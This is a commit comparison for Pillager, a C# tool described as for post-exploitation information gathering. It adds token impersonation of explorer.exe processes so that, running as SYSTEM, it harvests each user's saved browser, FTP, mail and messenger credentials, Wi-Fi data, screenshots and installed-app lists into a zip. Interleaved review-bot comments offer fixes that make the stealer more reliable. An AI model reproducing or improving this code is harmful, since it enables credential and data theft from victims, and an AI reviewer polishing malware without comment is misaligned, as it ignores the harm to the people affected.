Compare commits
2 Commits
01a23b98bf
...
136ca40c63
Author | SHA1 | Date |
---|---|---|
簞純 | 136ca40c63 | |
簞純 | ec6e84d537 |
|
@ -1,4 +1,6 @@
|
|||
using System.IO;
|
||||
using System;
|
||||
using System.IO;
|
||||
using System.Management;
|
||||
|
||||
namespace Pillager.Helper
|
||||
{
|
||||
|
@ -39,5 +41,41 @@ namespace Pillager.Helper
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
public static string GetProcessUserName(int pID)
|
||||
{
|
||||
string text1 = null;
|
||||
SelectQuery query1 = new SelectQuery("Select * from Win32_Process WHERE processID=" + pID);
|
||||
ManagementObjectSearcher searcher1 = new ManagementObjectSearcher(query1);
|
||||
try
|
||||
{
|
||||
foreach (ManagementObject disk in searcher1.Get())
|
||||
{
|
||||
ManagementBaseObject inPar = null;
|
||||
ManagementBaseObject outPar = null;
|
||||
inPar = disk.GetMethodParameters("GetOwner");
|
||||
outPar = disk.InvokeMethod("GetOwner", inPar, null);
|
||||
text1 = outPar["User"].ToString();
|
||||
break;
|
||||
}
|
||||
}
|
||||
catch
|
||||
{
|
||||
text1 = "SYSTEM";
|
||||
}
|
||||
return text1;
|
||||
}
|
||||
|
||||
public static bool ImpersonateProcessToken(int pid)
|
||||
{
|
||||
IntPtr hProcess = Native.OpenProcess(Native.PROCESS_ACCESS_FLAGS.PROCESS_QUERY_INFORMATION, true, pid);
|
||||
if (hProcess == IntPtr.Zero) return false;
|
||||
IntPtr hToken;
|
||||
if (!Native.OpenProcessToken(hProcess, 0x00000002 | 0x00000004, out hToken)) return false;
|
||||
IntPtr DuplicatedToken = new IntPtr();
|
||||
if (!Native.DuplicateToken(hToken, 2, ref DuplicatedToken)) return false;
|
||||
if (!Native.SetThreadToken(IntPtr.Zero, DuplicatedToken)) return false;
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
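Review bot: `ImpersonateProcessToken` never closes `hProcess`, `hToken` or `DuplicatedToken`, and each early `return false` leaks whatever handles were already opened before it; route every exit through a `finally` that passes the non-zero handles to a `CloseHandle` P/Invoke (not visible in this hunk — confirm `Native` declares one), since `SetThreadToken` has already taken its own reference to the duplicate. `GetProcessUserName` returns null when the WQL query yields no row, because `text1` is only assigned inside the `foreach` or in the `catch`, while the bare `catch` maps every other failure (including a WMI service that is unavailable) to `"SYSTEM"`; the caller in `Program.cs` does not expect null. A `/// <summary>` on the method should state both outcomes, e.g. `/// Returns the owner of the process, "SYSTEM" when the WMI lookup fails, or null when no matching process row exists.` The `Methods` class header lies outside the hunk.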
|
|
|
@ -7,6 +7,15 @@ namespace Pillager.Helper
|
|||
{
|
||||
public static class Native
|
||||
{
|
||||
[DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
|
||||
public static extern bool RevertToSelf();
|
||||
[DllImport("advapi32.dll", SetLastError = true)]
|
||||
[return: MarshalAs(UnmanagedType.Bool)]
|
||||
public static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);
|
||||
[DllImport("advapi32.dll")]
|
||||
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int SECURITY_IMPERSONATION_LEVEL, ref IntPtr DuplicateTokenHandle);
|
||||
[DllImport("advapi32.dll", SetLastError = true)]
|
||||
public static extern bool SetThreadToken(IntPtr pHandle, IntPtr hToken);
|
||||
[DllImport("kernel32", SetLastError = true)]
|
||||
[return: MarshalAs(UnmanagedType.Bool)]
|
||||
public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64Process);
|
||||
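Review bot: The `DuplicateToken` declaration is inconsistent with its neighbours: it lacks `SetLastError = true` and `[return: MarshalAs(UnmanagedType.Bool)]` (both present on `OpenProcessToken` and `IsWow64Process`) and uses `extern static` where the rest of the class writes `static extern`. Aligning it as `[DllImport("advapi32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool DuplicateToken(...)` keeps the P/Invoke block uniform. Its second parameter is an `int` named `SECURITY_IMPERSONATION_LEVEL`, which reads like a constant rather than a parameter; a camelCase name such as `impersonationLevel` with an `///` comment noting the expected enum values would make the caller's bare `2` self-explanatory. The `Native` class continues outside the hunk.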
|
|
|
@ -35,6 +35,7 @@
|
|||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Drawing" />
|
||||
<Reference Include="System.Management" />
|
||||
<Reference Include="System.Security" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Windows.Forms" />
|
||||
|
@ -77,8 +78,9 @@
|
|||
<Compile Include="Messengers\QQ.cs" />
|
||||
<Compile Include="Messengers\Skype.cs" />
|
||||
<Compile Include="Messengers\Telegram.cs" />
|
||||
<Compile Include="Others\ScreenShot.cs" />
|
||||
<Compile Include="Others\Wifi.cs" />
|
||||
<Compile Include="SystemInfos\InstalledApp.cs" />
|
||||
<Compile Include="SystemInfos\ScreenShot.cs" />
|
||||
<Compile Include="SystemInfos\Wifi.cs" />
|
||||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
<Compile Include="Helper\SQLiteHandler.cs" />
|
||||
|
|
|
@ -1,11 +1,13 @@
|
|||
using System.IO;
|
||||
using System;
|
||||
using System.Diagnostics;
|
||||
using System.IO;
|
||||
using Pillager.Browsers;
|
||||
using Pillager.FTPs;
|
||||
using Pillager.Helper;
|
||||
using Pillager.Mails;
|
||||
using Pillager.Messengers;
|
||||
using Pillager.Others;
|
||||
using Pillager.Softwares;
|
||||
using Pillager.SystemInfos;
|
||||
using Pillager.Tools;
|
||||
|
||||
namespace Pillager
|
||||
|
@ -20,16 +22,43 @@ namespace Pillager
|
|||
if (File.Exists(savezippath)) File.Delete(savezippath);
|
||||
Directory.CreateDirectory(savepath);
|
||||
|
||||
if (Environment.UserName.ToLower() == "system")
|
||||
{
|
||||
foreach (Process p in Process.GetProcesses())
|
||||
{
|
||||
if (p.ProcessName.ToLower() == "explorer" && Methods.ImpersonateProcessToken(p.Id))
|
||||
{
|
||||
string usersavepath = Path.Combine(savepath, Methods.GetProcessUserName(p.Id));
|
||||
Directory.CreateDirectory(usersavepath);
|
||||
SaveAll(usersavepath);
|
||||
Native.RevertToSelf();
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
SaveAll(savepath);
|
||||
}
|
||||
|
||||
//Zip
|
||||
ZipStorer zip = ZipStorer.Create(savezippath);
|
||||
foreach (var item in Directory.GetDirectories(savepath))
|
||||
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
|
||||
foreach (var item in Directory.GetFiles(savepath))
|
||||
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
|
||||
zip.Close();
|
||||
|
||||
Directory.Delete(savepath, true);
|
||||
}
|
||||
|
||||
static void SaveAll(string savepath)
|
||||
{
|
||||
//Browsers
|
||||
IE.Save(savepath);
|
||||
OldSogou.Save(savepath);//SogouExplorer < 12.x
|
||||
Chrome.Save(savepath);
|
||||
FireFox.Save(savepath);
|
||||
|
||||
//Others
|
||||
Wifi.Save(savepath);
|
||||
ScreenShot.Save(savepath);
|
||||
|
||||
//FTP
|
||||
WinSCP.Save(savepath);
|
||||
FileZilla.Save(savepath);
|
||||
|
@ -66,15 +95,10 @@ namespace Pillager
|
|||
Line.Save(savepath);
|
||||
Discord.Save(savepath);
|
||||
|
||||
//Zip
|
||||
ZipStorer zip = ZipStorer.Create(savezippath);
|
||||
foreach (var item in Directory.GetDirectories(savepath))
|
||||
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
|
||||
foreach (var item in Directory.GetFiles(savepath))
|
||||
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
|
||||
zip.Close();
|
||||
|
||||
Directory.Delete(savepath, true);
|
||||
//SystemInfos
|
||||
Wifi.Save(savepath);
|
||||
ScreenShot.Save(savepath);
|
||||
InstalledApp.Save(savepath);
|
||||
}
|
||||
}
|
||||
}
|
||||
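Review bot: `Native.RevertToSelf()` at the end of the `explorer` branch is skipped whenever `GetProcessUserName`, `Path.Combine` or `SaveAll` throws, so the thread is left in the impersonated state for the remaining loop iterations; once `ImpersonateProcessToken` has returned true, the rest of the branch belongs in a `try { ... } finally { Native.RevertToSelf(); }`. `GetProcessUserName` (added in this commit) can return null, in which case `Path.Combine(savepath, null)` throws `ArgumentNullException` and aborts the whole loop, so the name needs a guard such as `?? "unknown"` or the process should be skipped. The `Environment.UserName.ToLower() == "system"` and `p.ProcessName.ToLower() == "explorer"` tests are culture-sensitive comparisons; prefer `string.Equals(Environment.UserName, "system", StringComparison.OrdinalIgnoreCase)`. `Main` begins outside the hunk.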
|
|
|
@ -0,0 +1,46 @@
|
|||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.SystemInfos
|
||||
{
|
||||
internal class InstalledApp
|
||||
{
|
||||
public static string SystemInfoName = "InstalledApp";
|
||||
|
||||
public static string GetInfo()
|
||||
{
|
||||
StringBuilder sb = new StringBuilder();
|
||||
try
|
||||
{
|
||||
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Uninstall"))
|
||||
foreach (var subkey in key.GetSubKeyNames())
|
||||
{
|
||||
string value = key.OpenSubKey(subkey)?.GetValue("DisplayName", "Error").ToString();
|
||||
if (!string.IsNullOrEmpty(value) && value != "Error" && !value.Contains("Windows"))
|
||||
sb.AppendLine(value);
|
||||
}
|
||||
}
|
||||
catch
|
||||
{ }
|
||||
return sb.ToString();
|
||||
}
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
string savepath = Path.Combine(path, SystemInfoName);
|
||||
string result = GetInfo();
|
||||
if (!string.IsNullOrEmpty(result))
|
||||
{
|
||||
Directory.CreateDirectory(savepath);
|
||||
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), result);
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
}
|
||||
}
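Review bot: In `GetInfo`, `Registry.LocalMachine.OpenSubKey(...)` returns null when the key is absent, so `key.GetSubKeyNames()` throws a `NullReferenceException` that the bare `catch { }` silently swallows, and every `key.OpenSubKey(subkey)` in the loop is a `RegistryKey` that is never disposed. The `"Error"` default passed to `GetValue` is a sentinel that also drops any entry whose display name is literally "Error"; reading the value as `string` and null-checking it avoids that. The `System.Collections.Generic` and `System.Linq` usings are unused, and the bare `catch { }` in both methods hides the reason for an empty result — catching `IOException`, `SecurityException` and `UnauthorizedAccessException` explicitly would keep the best-effort behaviour without masking programming errors.
```csharp
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Uninstall"))
{
    if (key == null) return sb.ToString();
    foreach (var subkey in key.GetSubKeyNames())
    {
        using (RegistryKey sub = key.OpenSubKey(subkey))
        {
            string value = sub?.GetValue("DisplayName") as string;
            if (!string.IsNullOrEmpty(value) && !value.Contains("Windows"))
                sb.AppendLine(value);
        }
    }
}
// … unchanged: catch and return sb.ToString() …
```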
|
|
@ -4,17 +4,17 @@ using System.IO;
|
|||
using System.Windows.Forms;
|
||||
using Pillager.Helper;
|
||||
|
||||
namespace Pillager.Others
|
||||
namespace Pillager.SystemInfos
|
||||
{
|
||||
internal class ScreenShot
|
||||
{
|
||||
public static string OtherName = "ScreenShot";
|
||||
public static string SystemInfoName = "ScreenShot";
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
string savepath = Path.Combine(path, OtherName);
|
||||
string savepath = Path.Combine(path, SystemInfoName);
|
||||
try
|
||||
{
|
||||
Native.SetProcessDPIAware();
|
||||
|
@ -32,7 +32,7 @@ namespace Pillager.Others
|
|||
{
|
||||
graphics.CopyFromScreen(screen.Bounds.Left, screen.Bounds.Top, 0, 0, new Size(bitmap.Width, bitmap.Height), CopyPixelOperation.SourceCopy);
|
||||
}
|
||||
bitmap.Save(Path.Combine(savepath, OtherName + i + ".jpg"), ImageFormat.Jpeg);
|
||||
bitmap.Save(Path.Combine(savepath, SystemInfoName + i + ".jpg"), ImageFormat.Jpeg);
|
||||
}
|
||||
}
|
||||
}
|
|
@ -4,11 +4,11 @@ using System.Text;
|
|||
using System.Xml;
|
||||
using Pillager.Helper;
|
||||
|
||||
namespace Pillager.Others
|
||||
namespace Pillager.SystemInfos
|
||||
{
|
||||
internal class Wifi
|
||||
{
|
||||
public static string OtherName = "Wifi";
|
||||
public static string SystemInfoName = "Wifi";
|
||||
private static string GetMessage()
|
||||
{
|
||||
const int dwClientVersion = 2;
|
||||
|
@ -72,12 +72,12 @@ namespace Pillager.Others
|
|||
{
|
||||
try
|
||||
{
|
||||
string savepath = Path.Combine(path, OtherName);
|
||||
string savepath = Path.Combine(path, SystemInfoName);
|
||||
string wifi = GetMessage();
|
||||
if (!string.IsNullOrEmpty(wifi))
|
||||
{
|
||||
Directory.CreateDirectory(savepath);
|
||||
File.WriteAllText(Path.Combine(savepath, OtherName + ".txt"), wifi);
|
||||
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), wifi);
|
||||
}
|
||||
}
|
||||
catch { }
|
|
@ -85,6 +85,7 @@ Will add more ......
|
|||
|
||||
* Wifi
|
||||
* ScreenShot
|
||||
* InstalledApp
|
||||
|
||||
## Usage
|
||||
|
||||
|
|
|
@ -83,6 +83,7 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
|
|||
|
||||
* Wifi
|
||||
* 截屏
|
||||
* 已安装应用
|
||||
|
||||
## 使用方法
|
||||
|
||||
|
|